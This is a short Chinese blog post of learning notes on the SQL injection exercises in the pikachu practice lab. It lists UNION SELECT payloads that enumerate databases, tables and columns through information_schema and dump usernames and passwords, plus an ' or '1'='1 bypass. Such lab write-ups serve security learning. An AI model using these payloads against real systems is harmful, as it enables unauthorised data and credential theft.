pikachu学习——sql注入部分
2021/12/5 2:17:05
本文主要是介绍pikachu学习——sql注入部分,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
数字型注入
用burpsuite进行抓包
发现变量为id,因为是字符型所以构造payload为
发现并没有报错,说明有两个字段
之后要获取显示位,使用union select 1,2去实验
发现1和2都回显了
在1或者2上面构造payload
按照下面的步骤来进行注入:
获取数据库:
union select 1,group_concat(schema_name) from information_schema.schemata --+
获取数据库表:
union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+
获取表中所有字段:
union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()--+
获取数据:
union select username,password from users limit 0,1 --+
字符型注入
通过' or '1'='1
就可以把数据库都爆出来
其余的思路跟数字型差不多
这篇关于pikachu学习——sql注入部分的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-26小白家庭 nas 搭建方案-icode9专业技术文章分享
- 2024-06-23AI大模型企业应用实战(14)-langchain的Embedding
- 2024-06-23AI大模型企业应用实战(15)-langchain核心组件
- 2024-06-23AI大模型企业应用实战(16)-langchain核心组件
- 2024-06-23AI 大模型企业应用实战(06)-初识LangChain
- 2024-06-19EntBot.ai: AI Website Chatbot for Product Guides and Development Doc
- 2024-06-17zero-shot-learning-definition-examples-comparison
- 2024-06-06Package Easy(基于 NSIS 的打包exe安装包工具)使用方法-icode9专业技术文章分享
- 2024-06-06基于 casdoor 的 ELK 开源登录认证解决方案: elk-auth-casdoor-icode9专业技术文章分享
- 2024-05-29Elasticsearch慢查询日志配置